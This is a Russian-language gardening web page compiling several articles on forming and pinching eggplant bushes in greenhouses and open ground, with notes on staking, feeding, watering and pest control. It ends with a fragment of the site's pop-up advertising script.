1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Суть формирования баклажанов и требования к нему

Правила формирования баклажанов в открытом грунте

После долгой подготовки семян, ожидания нужных погодных условий и высадки их в открытый грунт наступает следующий этап — формирование баклажанов. Он включает в себя оформление листьев растения, направления роста путем подвязывания и пасынкования.

Правила формирования баклажанов в открытом грунте

Зачем проводят пасынкование

Процесс пасынкования важен для культур, потому что:

  • Не дает растению попусту разрастаться, а направляет силы на созревание плодов.
  • Обеспечивает доступ света ко всем частям растения.
  • Обеспечивает меньшую вероятность появления грибка за счет снижения тени.
  • Делает выращивание проще и приятнее.

Проводить процедуру на открытом грунте необязательно, но в теплице без нее не обойтись. Чтобы избежать пасынкования, на выращивание выбирают низкорослые сорта синеньких.

Формирование на открытом грунте

Посадка в открытую почву подходит для людей, у которых нет теплиц. Но на открытом грунте формирование куста баклажана сопровождается рядом сложностей. Для этого приходится использовать дополнительные инструменты и материалы.

Схема формирования кустов баклажанов предполагает проведение процедуры не более, чем в 3 стебля. Выбирают самые крупные и мощные побеги. Для качественного процесса совершают следующие действия:

  • Натягивают вдоль грядки проволоку на небольшом расстоянии от земли, чтобы крепить на нее стебли и листья.
  • Ждут появления 3 побегов. Остальное удаляют, когда они достигают 5-8 см в длину.
  • Удаляют листья, которые затеняют завязи культуры. Плод начнет созревать, когда на него попадают прямые лучи солнца.

Формирование в теплице

Посадка баклажанов возможна и в теплицу. Например, хорошо себя зарекомендовали постройки из поликарбоната.

Формирование баклажанов в теплице гораздо важнее, чем на открытом грунте. В теплицах созданы благоприятные условия для овощей, поэтому им необходима формировка и тщательный уход, иначе они разрастутся, но не будут плодоносить.

Также посадка в закрытом помещении предполагает ограниченное пространство, поэтому стоит вопрос и об экономии места. Его решает подвязывание.

Технология проведения

Пасынкование проводят в сухую погоду

Формировать посадки в теплице нужно, придерживаясь правил:

  • Куст должен быть выше 30 см (рассаду не пасынкуют).
  • Проводят процедуру в сухую погоду, чтобы на месте отщипывания не завелся грибок.
  • Отщипывают верхушку лишнего стебля, открывая доступ к свету другим (другому) стеблю.
  • Когда сформировались плоды, удаляют новые соцветия, чтобы направить культуру на созревание плодов.

Также процедуру проводят, если культура выглядит болезненно или замедлила рост и не цветет. Для здоровых растений процедуру проводят перед цветением, чтобы успешно сформировались завязи.

Пересадка неблагоприятна из-за прихотливости баклажанов к условиям окружающей среды.

Схемы пасынкования в теплице

Формировать побеги в теплице рекомендуют по таким схемам:

Первые 2 способа используют чаще. От количества побегов зависит количество урожая, но уход за несколькими побегами сложнее, чем за одним.

  • В тепличных стесненных условиях формирование кустов баклажана проводят по первой схеме — оставляют один побег. Выбирают крепкий побег и подвязывают его вертикально. Остальные удаляют. Места надрезов обрабатывают известью или древесной золой.
  • Формировка по второму типу базируется на выборе 2 сильных побегов, которые подвязывают, как и в первом случае. Когда куст вырастает, удаляют все листья и побеги ниже 45-50 см. Во время цветения рекомендуют оставить до 20 бутонов. Так растение продуктивно плодоносит.

Процессу предшествует длительная подготовка. Семена и рассаду требуется посадить в грунт на разных сроках, пасынкование тоже проводят в разные периоды. Молодую рассаду накрывают пленкой и ждут всходов. Ждут, пока ростки окрепнут и проводят процедуру, когда они достигнут 35 см в высоту.

Формирование баклажанов в теплице

Баклажан является теплолюбивым овощем. Для комфортного произрастания ему необходима высокая температура и безветренная погода. Это капризное растение, которое требует грамотного подхода к выращиванию. Одним из важных агротехнических мероприятий является формирование баклажанов, благодаря которому можно добиться высоких урожаев. Как осуществляется этот процесс в теплице и открытом грунте, читайте в статье.

Историческая справка

Баклажан является травянистой многолетней культурой, относится к роду Пасленовых. Произошел из Восточной Индии, где на протяжении долгого времени произрастал как дикорастущий овощ. Окультурен 15 столетий назад, после чего его выращиванием начали заниматься в различных регионах Центральной Азии, а также Китая.

В средиземноморские районы Европы и Африку баклажан был завезен арабскими торговцами. В нашей стране овощ стал известен только в 17-18 столетии. Здесь он быстро приобрел популярность и народное название «синенький».

Формирование куста: для чего его проводят?

Высокая урожайность баклажанов во многом зависит от правильности их посадки и ухода за ними. Если не осуществлять эти агротехнические мероприятия, вырастет мало невкусных плодов. Уход заключается не только в поливе и подкормке, но и в формировании баклажанов в открытом грунте и теплице.

При формировании кустов осуществляется удаление лишних завязей, чтобы они не высасывали питательные вещества из растений. Слабые или больные кусты не следует формировать, так как хорошего урожая с них не получить. Не нуждаются в этом и низкорослые сорта баклажанов, так как они это делают самостоятельно. Их не нужно даже подвязывать.

Баклажаны – солнцелюбивые культурные растения. Эта особенность обязательно учитывается при их формировании. На все части растения должно попадать много солнца, тогда плоды будут созревать лучше.

Когда формировать?

Сроки проведения данной процедуры не имеют точных дат. На их определение оказывают влияние климатические условия региона, где культивируются баклажаны, и сорта.

Произрастая в теплице, баклажаны подвергаются процедуре формирования, когда достигнут в высоту 30 см. Формирование баклажанов в открытом грунте осуществляется спустя 10-15 дней после того, как рассаду высадят на постоянное место произрастания.

Нужно подождать, когда установится жаркая и влажная погода. Для формирования баклажанов выбирают безветренный вечер или тихое утро. Это агротехническое мероприятие проводят регулярно на протяжении всего вегетативного периода с периодичностью раз в семь дней.

Формирование баклажанов в теплице

Для выращивания данной культуры в условиях закрытого грунта выбирают высокорослые сорта баклажанов, так как они занимают меньшую площадь, чем раскидистые кусты других разновидностей. Для круглогодичного произрастания овощей больше всего подходит теплица, в которой будет удерживаться тепло, не накапливаться конденсат. Важно, чтобы сооружение выдерживало перепады температур и обладало воздухообменом на высоком уровне. Всем этим требованиям отвечает теплица из поликарбоната. При строительстве этого сооружения предусматривается искусственный обогрев и освещение, встроенная вентиляция для проветривания помещения, система орошения, а также слежения за температурным режимом.

Формирование баклажанов в теплице из поликарбоната осуществляется в один или два стебля, в зависимости от состояния растений. Сначала все кусты осматриваются. У слабых растений оставляется один стебель, а у сильных – два. О процедуре проведения данного мероприятия читайте ниже в статье.

Формирование баклажанов в теплице является необходимой фазой в развитии растений. Однако его можно избежать при выращивании низкорослых сортов овощей, которые не нуждаются в формировании. Но, как правило, их редко выращивают в теплицах.

Оставляем один стебель

Формирование куста баклажана можно выполнить в один или несколько основных стеблей. Причины, по которым оставляют один стебель на растении, следующие:

  • Если куст ослаблен, неразвит или пересадка рассады прошла неудачно. В данном случае поступление питательных веществ осуществляется в единственный стебель и плоды, формирующиеся на нем.
  • Недостаточно места в теплице. Такое формирование устраняет дефицит площади.

Процедура данного мероприятия такова: нужно оставить единственный побег, причем самый сильный. После удаления лишней поросли куст сразу же подвязывается веревочкой. Некоторые огородники считают это лишней тратой времени, хотя это неверное мнение. Подвязка обязательно нужна, так как в процессе роста плоды набирают массу, стебель может не выдержать такой нагрузки и сломаться, в результате растение погибнет.

В период образования завязей куст нужно прореживать. Для этого обрываются мелкие плоды, оставляются только крупные. Чтобы завязи хорошо развивались, верхушку у побега прищипывают, а вновь образованные стебельки и бутончики удаляют. Это делается для того, чтобы крупные плоды успели вызреть до наступления холодов. Всякий раз при удалении любых частей растения (завязей, цветков, листьев, побегов) следует избавляться от засохших венчиков. В тепличных условиях, где всегда высокая влажность, это может стать причиной грибкового заболевания.

Формирование в несколько стеблей

Данный способ более эффективен при выращивании баклажанов в теплице, где на счету каждый метр квадратный площади грядок. Понятно, с нескольких стеблей одного куста можно собрать больше плодов, чем с одного. Формирование баклажанов в несколько стеблей аналогично предыдущей схеме, только оставить нужно не один, а два или больше самых крепких побега. В остальном все так же:

  • Когда высота куста достигнет 30 см и больше, верхушка основного стебля прищипывается, то есть точка роста удаляется. Растение начнет ветвиться.
  • Появившиеся молодые побеги удаляются. Остаются только верхние, самые жизнеспособные, в количестве 2-5 штук, которые и являются основными стеблями.
  • Растение прореживается, для чего удаляются вновь образованные мелкие завязи со всех стеблей, которые были оставлены при формировании баклажанов. На кусте оставляется около 20 плодов. По мере созревания их следует срывать еще до массового сбора урожая.
  • По окончании сезона, когда баклажаны наберут достаточно большую массу, на кусте оставляют 6-7 плодов. В противном случае стебель не выдержит их вес и сломается.

Вне зависимости от того, по какой схеме осуществлялось формирование куста баклажана, всегда нужно следить за состоянием растения. При появлении пожухлых и желтых листьев их следует обрывать. Удалению подлежит молодая поросль, бесплодные стебли, а также деформированные плоды, завязи и цветки.

Формирование с использованием шпалеры

Такой способ удобен для высоких теплиц с пленочным и стеклянным покрытием. Так можно формировать баклажаны в один стебель, два и более. На шпалере закрепляется шпагат, нижним его концом подвязывается стебель на уровне первой развилки. Делается просторная петля, так как стебель в процессе роста будет утолщаться. Выбирается еще несколько развитых стеблей (в зависимости от желания или условий). Они также подвязываются к шпалере. Постепенно, по мере развития растения, будет увеличиваться в размере и стебель. Его следует обкручивать шпагатом. Обычно оставляют два-три основных побега, так как формирование баклажанов в один основной стебель является трудоемкой процедурой, да и урожайность будет гораздо ниже.

Формирование с использованием коловой системы

Данный способ приемлем для выращивания культуры в открытом грунте. Площадь участка размечается на квадраты, по углам которых высаживают растения. В центр каждой геометрической фигуры вбивается кол двухметровой высоты. Пленка крепится к нему, а нижними концами – к небольшим колышкам, вкопанным в землю.

Получается что-то похожее на шатер. Для проветривания растений пленка по краям поднимается. Можно использовать не один, а четыре кола, верхние концы которых легко соединяются вместе.

Подвязка

Формирование баклажанов в открытом грунте и теплице включает в себя такую процедуру, как подвязка стеблей. Особенно в ней нуждаются растения высокорослых сортов. Однако нужно учитывать следующие моменты:

  • Поскольку стебли у баклажанов хрупкие, для подвязки используется мягкий, но достаточно прочный материал.
  • При осуществлении подвязки в разных местах учитывается изменение освещенности. Не следует затенять растение, так как это может вызвать его загнивание.
  • Если куст сильно разветвлен, каждый стебель подвязывается отдельно.
  • Петля, поддерживающая растение, должна быть шире его стебля, так как в процессе роста стебель будет утолщаться.

Выращивание баклажанов: общие правила

Вне зависимости от места произрастания растений — в открытом грунте или теплице, — применяется только рассадный способ. Возраст саженцев не должен превышать 60-70 дней. При выращивании баклажанов следует придерживаться следующих правил:

  • Для нормального роста продолжительность светового дня должна составлять 12-14 часов в сутки.
  • Баклажаны – тепло- и влаголюбивая культура. Для их произрастания необходима температура воздуха 25-30 о С, влажность – 65-70%.
  • Одним из главных требований является своевременное формирование баклажанов.

Выращивание теплицах позволяет создавать такие условия. Но в личных хозяйствах овощи выращивают на огородных грядках, используя при этом временно установленные укрытия из пленки, которые называются парниками. Когда произведена посадка баклажанов, формирование кустов осуществляется после укоренения растений вне зависимости от места произрастания.

Формирование куста баклажан

Кроме своевременной подкормки, полива, борьбы с вредителями, необходимо формирование куста баклажан. Это обязательная процедура, от которой зависит развитие растения и количество плодов. Формирование производится с учетом особенностей сортов баклажанов.

Эта южная овощная культура, которая в настоящее время успешно выращивается на всей территории России в открытом грунте и с применением различных видов укрытий. Синенькие (народное название баклажанов) считается довольно капризной культурой, требующей повышенного внимания со стороны огородников. Однако, применяя общие правила по уходу, можно получать довольно значительные урожаи у себя на грядках.

Характеристика синеньких

В имеющемся разнообразии видов можно потеряться. Современная селекция представляет баклажаны не только стандартной фиолетовой расцветки, в настоящее время выращивают белые, желтые, оранжевые, красные и даже зеленые плоды. Выбирая семена на посадку, следует учитывать, что есть сорта и гибриды. Приставка к названию F1 — это значит гибрид, выращивают их только в теплицах. Гибриды более требовательны к агротехнике и минеральным подкормкам, но они устойчивее к заболеваниям. Сорта же менее прихотливы к содержанию и уходу, и могут выращиваться в открытом грунте.

Различают сорта по типу роста:

  • индетерминантные с неограниченным ростом, нуждающиеся в обязательном формировании;
  • низкорослые сорта, которым формирование тоже необходимо, но в меньшей степени;
  • и по сроку созревания: ранние (Робин Гуд, Буржуй F1, Черный красавец, Король Севера) и среднеспелые (Универсал, Симферопольский, Бычье Сердце, Король рынка, Черномор, Альбатрос, Алмаз).

Для открытого грунта и пленочных укрытий выбирают скороспелые сорта с компактным кустом до 1 м. в высоту (Альбатрос, Деликатес, Карслон, Бычий Лоб). В парниках и теплицах выращивают баклажаны средне рослые до 1,5м. и высокорослые, которые могут разрастаться до 2 м. и выше (Арап, Гелиос, Городовой F1, Дирижабль).

Формирование низкорослых и средне рослых сортов производится разными способами.

Общие правила выращивания

Баклажаны выращивают только рассадным способом. Оптимальный возраст рассады 60-70 дней.

Жителям средней полосы России и Подмосковья лучше выбирать раннеспелые сорта для открытого грунта. Баклажаны среднеспелых сортов выращивают в теплицах, так как такие сорта наиболее урожайны обладают круаными плодами, но более поздно созревают.

Правила для любого способа выращивания:

  • световая продолжительность 12-14 часов, необходимая для роста;
  • синеньким важна постоянная температура +25 -+30 градусов;
  • высокая влажность 65-70%;
  • своевременное формирование кустов баклажанов, удаление лишних побегов и завязей.

Проще всего создать такие условия в теплицах, но опытные огородники выращивают в открытом грунте на приподнятых грядах, применяя временные пленочные укрытия. Формирование баклажанов в условиях рискованного земледелия дает получить полноценный урожай за короткий летний период.

Способы формирования куста баклажанов

В закрытых грунтах и теплице из поликарбоната при выращивании баклажан формирование куста осуществляют следующими основными способами.

  1. В один стебель;
  2. В два стебля;
  3. В три стебля (и более).

Формирование в 1 стебель

Такой способ ускоряет вызревание баклажанов. Метод применяется при минимуме места в теплице и позволяет разместить большое количество саженцев. Куст формируют в ствол, оставляя один наиболее сильный побег.

Необходимо удалять пасынки в пазухах листьев, а главный ствол подвязывать к опоре. Подвязка необходима, так как куст может достигать внушительных размеров. В этом случае зеленая масса значительно нарастает, и у баклажана может не хватить сил на вызревание плодов. Во избежание этого, нужно удалять все листы внизу куста до первой завязи, оставляя ствол голым.

Нужно уменьшить количество азотных удобрений, вносимых под баклажаны. Для лучшего развития, можно подкормить растение золой (1 стакан на 2 куста баклажана). Побеги прищипывают, когда на каждом образуется 4-5 плодов. Количество цветков регулируют, оставляя наиболее крупные.

Формирование в 2 и более кустов

Этот вариант выполняют когда растение достигнет 25-30 см в высоту. Формировать можно только абсолютно здоровые и развитые растения. Главный ствол прищипываем и оставляем 2 или 3 самых верхних и сильных побега, остальные тоже удаляем впоследствии, по мере появления.

Убираем побеги на высоте 45-50 см от земли до начала разветвления. Количество основных побегов определяем в зависимости от освещения и наличия свободного места.

Скелетные ветки аккуратно подвязываем на шпалеры. Затем формируем каждое ответвление по отдельности. Выбираем самый сильный отросток, делая его основным. На более слабом оставляем один лист и плод, и прищипываем.

Для полноценного развития должно быть не более 8-10 завязей на каждом стебле. То есть с одного куста можно получить до 20-30 развитых плодов.

Баклажаны не выносят даже малейшего затемнения, для развития саженцев необходимо достаточно света. Поэтому раз в неделю посадки осматривают и удаляют листья, препятствующие доступу солнечного света.

Формирование кустов баклажан в открытом грунте

Выращивают открытым способом обычно низкорослые скороспелые сорта баклажан. Вызвано это необходимостью получить плоды в минимальные сроки при недолгом периоде вегетации. В подвязке такие кусты не нуждаются, но ограничивать количество завязей необходимо. Несмотря на то, что низкорослые кусты вырастают компактных размеров, нельзя допускать образования большого количества плодов.

Формировать баклажаны надо так — верхушку прищипывают при достижении высоты куста 30-35 см. При этом начинают активно образовываться боковые побеги, из которых выбирают и оставляют самые сильные. В группе соцветий выбирают наиболее крупные цветы, остальные удаляют.

На кусте в общей сложности оставляют не более 8 плодов. Слабые пасынки, образующиеся в пазухах, деформированные завязи и неразвитые плоды тоже убирают. Кусты до первой завязи очищают от листьев. Баклажаны располагают так, чтобы они не мешали росту друг друга и не создавали тень. Все манипуляции с кустами необходимо проводить при установлении влажной и жаркой погоды, периодичностью один раз в неделю, ранним утром или поздним вечером.

Формирование баклажанов в теплице и парниках

Формируют средне- и сильно рослые сорта баклажанов. Начинают этот процесс через 2 недели после высадки рассады на постоянное место. Формирование определяют исходя из состояния куста. Слабые и неразвитые растения пускают в один стебель, у более сильных кустов с хорошей корневой системой и толстым стволом оставляют несколько стеблей.

Обязательно используют подвязку саженцев, так как ветки у баклажанов хрупкие и могут ломаться под тяжестью плодов.

Для этого, над рядом растений натягивается проволока, а к ней привязывают каждый куст веревкой или шпагатом. Его обкручивают вокруг нижней части ствола. Допускается использование отдельных колышков. При этом нужно учитывать высоту растения и толщину стебля, опора должная быть выше куста баклажана.

Формировать лучше в пасмурную погоду или вечером. Формирование включает в себя так же удаление бесплодных и слабых побегов, цветков и завязей, ниже места разветвления или образования первой полноценной завязи.

Формирование баклажанов для хорошего урожая

Для выращивания в своём огороде такой культуры, как баклажан нужно знать несколько тонкостей ухода за этим растением. От правильного ухода, который включает в себя формирование кустов, подкормку, полив, профилактическую обработку против болезней и вредителей зависит качество и количество урожая, здоровье самих баклажан. Огородник, который знает, как правильно формировать кусты всегда получит здоровые и мощные растения, и снимет с них обильный урожай.

Для чего нужно формировать баклажаны?

Баклажаны завязывают плоды, при достаточном освещении кустов освещаемых прямыми солнечными лучами. От правильного формирования растений зависит весь будущий урожай баклажан. Если эту процедуру исключить из общего ухода, то большая часть завязей будет опадать, а оставшиеся плоды будут недоразвитыми и мелкими.

Как правильно сформировать куст

Для получения компактного куста, на котором будут формироваться цветы, завязи и плоды, нужно удалить верхушку основного стебля на растении. На кусте после этой процедуры начинают формироваться новые боковые побеги. Большую часть прироста нужно удалить, оставляя лишь самые крепкие.

Существует несколько схем для формирования кустов баклажанов. Их отличие заключается в количестве стеблей, растущих от вершины основного стебля. Их может быть от одного до трёх штук. Для каждого куста подбирается своя схема формировки.

В теплице из поликарбоната

Формирование кустов баклажанов, растущих в теплице из поликарбоната нужно производить при достижении растениями высоты в 25-30 сантиметров.

В тёплых условиях баклажаны вырастают выше (до 140 сантиметров), чем в открытом грунте и поэтому требуют корректировки куста.

Формирование куста с одним стеблем используется для высокорослых сортов. Верхушка основного стебля после прищипывания даёт новые побеги. Из всей поросли выбирается 1 самый сильный, а другие побеги удаляются. Лишние листья и завязи, растущие снизу нужно оборвать. Появившиеся во время роста растения новые побеги удаляются.

Высокие и средние сорта баклажан формируются в 2 стебля. После удаления верхней части растения, нужно оставить 2 пасынка, на которых в дальнейшем будут расти плоды. При появлении других пасынков, их регулярно удаляют.

Если теплица большая, а рассады баклажан мало, высокорослые растения можно сформировать в 3 стебля. Растения при этом нужно высаживать на расстоянии друг от друга (около 60-80 сантиметров). На одном из выбранных двух стеблей остаётся крепкий, сильный пасынок, который в дальнейшем сформируется в новый стебель.

При ветвлении побегов, из каждого разветвления остаётся самый сильный отросток, который будет основным. Слабый отросток нужно прищипнуть после второго листика, растущего над завязью. На нём должен остаться 1 плод. Другие пасынки нужно прищипывать по тому же принципу. На кусте должно сформироваться 5-12 плодов, растущих на основных побегах.

У высокорослых сортов основные стебли необходимо подвязывать по отдельности, работать нужно с особой аккуратностью, чтобы не повредить хрупкое растение.

Подвязывать растения в теплице нужно шпалерным способом.

  • Шпалеры из шпагата протягиваются через теплицу в несколько ступеней. З
  • акреплять шпагат нужно на колья, вбитые по краям рядов.
  • Подвязывать кусты необходимо около каждого разветвления, желательно в местах, где формируются плоды.
  • При подвязке сильно натягивать шпагат нельзя, так как он может повредить растение.

Низкие сорта баклажан прищипывать и подвязывать не нужно. Они высотой не превышают 40 сантиметров и поэтому легко переносят кущение.

Формирование баклажанов в теплице: видео

В открытом грунте

Кусты баклажанов в открытом грунте формируют на 10-15 день после посадки рассады. Пасынки, побеги, листья и завязи нужно удалять вручную. Верхушки высокорослых растений нужно прищипывать при достижении роста в 35 сантиметров.

Обрывать лишние листья не рекомендуется в дождливый или осень жаркий день. При выращивании растений в открытом грунте формирование производится рано утром или вечером.

Раны, которые образуются после удаления листьев и пасынков при работе в жару будут обжигаться солнцем и долго заживать. Их рекомендуется замазать древесной золой или жидкой известью.

Если растение ослаблено из-за образования на нём большого количества плодов, то для такого растения производится формировка куста в один стебель. Остаётся самый сильный побег, который подвязывается к опоре.

Формировать больные и слабые кусты не нужно. Получить обильный урожай с этих растений не получится.

Дважды в неделю на кусте необходимо удалять бесплодные побеги, завязи и побеги, которые формируются под разветвлением основного стебля. При сухой и жаркой погоде нижние отростки можно оставить для защиты почвы от пересыхания. В дождливое лето листья и плоды не должны касаться почвы, иначе они могут заболеть.

Для ускорения созревания плодов, за месяц до конца вегетации верхние части побегов нужно прищипнуть. При этом останавливается дальнейший рост куста.

Как формировать баклажаны в открытом грунте: видео

Уход за баклажанами летом

Первая подкормка вносится через 2-2,5 недели после посадки растений. Для этого используются комплексные минеральные удобрения. На 1 метр квадратный берётся водный раствор из 20 грамм суперфосфата, 10 грамм хлорида калия, 5 грамм аммиачной селитры. В процессе роста растений под корни можно вносить перепревший перегной или навоз, навозную жижу (4 килограмма на 1 метр).

В период плодоношения производится подкормка удобрениями, содержащими фосфор и азот.

Первый полив баклажанов после посадки в теплицу и открытый грунт производится на 5 день.

Воду нужно лить аккуратно под корень, не задевая листья. После полива производится рыхление почвы.

Заливать баклажаны не нужно, так как это приводит к повышению влажности и поражению растений грибковыми болезнями. Недостаток влаги также негативно сказывается на завязях. Созревшие плоды маленькие, безвкусные. Поливать растения нужно рано утром. Для сохранения влаги землю можно укрыть мульчёй из соломы.

Если баклажаны выращиваются в теплице, температуру внутри неё нужно держать на отметке не ниже +26 градусов. Низкие температуры губительны для растений. Теплица на протяжении всего роста растений должна хорошо проветриваться, в ней не должна накапливаться влага, которая может привести к появлению грибка.

Самыми частыми вредителями баклажан являются колорадские жуки, тля, паутинные клещи, белокрылки.

Для борьбы с ними использовать сильные пестициды нельзя, так как этот химикат впитывается в плоды. Кроме вредителей растения могут быть поражены серой гнилью, некрозом внутренней части плодов, мозаичным поражением и фитофторозом.
Опрыскивать растения пестицидами при цветении кустов приводит к отмиранию и опадению цветков.

На сегодняшний момент существует большое количество универсальных биологических средств, которые убивают вредных насекомых и болезни и не вредны людям.

Для того, чтобы обезопасить баклажаны от поражения вредителями и болезнями, на участке необходимо соблюдать севооборот. Рассаду баклажан нельзя высаживать на участок после того, как там выращивались пасленовые. Соседство с другими паслёновыми культурами также может привести к поражению болезнями и вредителями.

Перед посевом семян их нужно обрабатывать раствором марганцовки, почву прокаливать в духовке.

Профилактика позволяет избежать большинства болезней, что упрощает уход за баклажанами.

Баклажаны при правильном проведении мероприятий по уходу, в том числе и формировании кустов дают до 15 плодов за сезон, которые в зависимости от сорта могут достигать более 0,5 килограмм весом.

Как правильно формировать баклажаны

Баклажаны отличаются своей капризностью. Исключительно правильный уход за ними, соблюдение всех правил выращивания могут обеспечить вам качественный и богатый урожай плодов. Баклажаны рекомендуется правильно и своевременно подкармливать, поливать, бороться с вредителями и заболеваниями. Важную роль играет также пасынкование овоща (его формирование).

Чтобы получить высокий урожай баклажанов, кусты надо нормировать

Если вы будете знать, как формировать баклажаны, то это даст возможность вырастить крепкие, здоровые кусты этого овоща, способные принести богатый урожай.

Суть формирования баклажанов и требования к нему

Формирование баклажанов – процесс не менее важный, чем их полив или подкормка. Пасынкование (формирование) овоща рекомендуется проводить, соблюдая рекомендации, выработанные опытными огородниками с годами.

Период первого пасынкования данных овощей в открытом грунте требуется правильно выбрать.

Каждый сорт баклажанов характеризуется своим способом формирования куста. Поэтому схему рекомендуется выбирать в зависимости именно от сортовой принадлежности овоща.

Формирование на молодом кусте надо начинать через 2-3 недели после посадки

Производя формирование куста баклажана, не рекомендуется жалеть лишние завязи, которые тянут из растения жизненные силы. Оставив определенное количество самых сильных завязей, вы дадите им возможность активно и полноценно развиваться.

Растение слабое или заболевшее формировать не рекомендуется. Урожай из него не даст ожидаемого результата, а труд станет напрасным.

Активный рост баклажанов можно прекратить, если удалить верхушку куста. Правильное формирование куста заключается в удалении из него всех лишних веток, завязей или цветков. Этот процесс производится с целью уменьшения количества листовой массы и равномерного распределения всех питательных элементов по растению.

Низкорослые сорта культур в открытом грунте оставляют формироваться самостоятельно.

В подвязке такие сорта баклажанов не нуждаются, а формирование их заключается в том, что они самостоятельно и без всякой помощи разрастаются в низкорослый куст. Однако следует следить, чтобы кусты не мешали один другому, и между ними был свободный воздухооборот.

Формировку куста в теплице рекомендуется начинать спустя 2 недели после высадки саженцев. Растение внимательно осматривается, и лишние побеги удаляются.

Формирование зависит от выбранной схемы.

Создание куста баклажанов в открытом грунте не рекомендуют проводить в засушливую или чрезмерно увлажненную погоду. Это приведет к неправильному дальнейшему развитию растения. Худшим из вариантов есть возникновение инфекционных заболеваний в этот период.

Баклажаны в теплице нормировать надо обязательно

Пасынкование баклажанов в открытом грунте рекомендуется проводить ранним утром или поздно вечером. Связано это с тем, что поврежденные места требуют времени для восстановления.

Создание кустов баклажанов следует выполнять исключительно вручную, а не механическим способом. Растение хрупкое и может легко сломаться. Ручная работа не принесет ему вреда и не нанесет нежелательных повреждений.

Высокорослые сорта баклажанов нормируют в 1 стебель

Естественное освещение выступает для баклажанов неотъемлемым и необходимым условием правильного развития и роста. Поэтому создание куста в открытом грунте рекомендуется производить так, чтобы каждое из растений и его завязей качественно освещалась и имела доступ к солнечному свету. Это даст возможность плодам быстрее вызреть.

Низкорослые кусты баклажанов огородники не выращивают более 35-ти см в высоту. После достижения ним такого уровня главный стебель прищипывается. Эта процедура приостанавливает рост растения и дает возможность овощному кусту стать удобным для дальнейшего формирования. После прищипывания основного стебля растение начинает активно пускать боковые побеги. Именно из них будут выбираться наиболее крепкие для произведения формирования.

Формирование в 2 стебля в открытом грунте

Формирование куста в теплице включает в себя удаление завязей и новых цветков в период завершения вегетационного процесса.

Это дает возможность уже имеющимся плодам вырасти до необходимых размеров и созреть. Рост растения требуется постоянно контролировать, прищипывая каждый побег.

Виды и способы оформления кустов баклажанов

Опытные огородники различают такие способы формирования кустов баклажанов в открытом грунте:

  • формирование, которое производится в один стебель;
  • выращивание куста в 2 и больше стеблей.

Выбирать оптимальный вид формирования не сложно – это зависит от сортовой принадлежности баклажанов и состояния рассады.

Слабые растения принято формировать в один стебель. Если баклажаны выращиваются в теплице, такой способ экономичный и сохраняет больше места.

Формирование в один стебель позволяет получить крупные плоды

Одностеблевые кусты подвязываются вертикальным образом к шпагату или проволоке, которые закрепляются горизонтально поверх растений. Завязи на растениях в теплице следует прореживать, оставляются лишь самые крепкие и сильные из них.

Баклажаны в открытом грунте чаще всего формируются в несколько стеблей.

Эта схема более эффективная и при правильном выполнении всех действий дает большой урожай. Суть этого способа заключается в том, что изначально прищипывается основной стебель. После того, как растение выпустило достаточное количество боковых отростков, из них выбираются несколько самых сильных и надежных. Остальные удаляются. Количество оставляемых побегов зависит от того, в каком состоянии находится растение. Сильные кусты в силах выдержать до 5-ти боковых стеблей. Тонкие или приболевшие растения в открытом грунте способен выдержать не больше 2-х пасынков.

Низкорослые сорта пасынковать не надо

Если вы выберете правильную схему формирования куста, то с него можно получить близко 20-ти плодов за один сезон.

Рекомендации огородников

Любители и профессионалы, которые не один год занимаются активным выращиванием баклажанов в теплице, делятся своими советами и рекомендациями.

  1. Нижние пасынки рекомендуется удалять в жаркую или влажную погоду. Именно эти отростки способствуют переувлажнению грунта под растением или возникновению инфекционных заболеваний.
  2. Когда в теплице чрезмерно сухой воздух нижние отростки удалять не рекомендуется. Они помогают придерживать влагу и не дают почве пересыхать.
  3. Формирование, которое производится при помощи секатора или другого приспособления, требует стерильности инструментов.
  4. Работая в теплице, исключите внесение в нее инфекции искусственным путем. После формирования каждого растения тщательно обрабатывайте все инструменты. Это не даст возможность перенести заболевание (если оно имеется) от одного растения к другому.
  5. Не рекомендуется давать пасынкам перерастать, удалять их необходимо вовремя. Это сохранит в овощной культуре питательные вещества, необходимые для развития и созревания плодов.
  6. Не рекомендуется вносить чрезмерное количество органики в почву. Она способствует росту зеленой массы, а не плодов.

Мелкие завязи баклажанов лучше удалять

Больные листья или листья, которые подверглись деформации следует удалять. Их появление свидетельствует о возможном заболевании растения. Хрупкие или слабые завязи также подлежат удалению.

Создание правильного куста баклажанов является одним из важнейших этапов в процессе выращивания этой культуры. Выполняя все правильно, прислушиваясь к рекомендациям и практическим советам, вы сможете насладиться максимальным урожаем здоровых, красивых и ровных плодов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
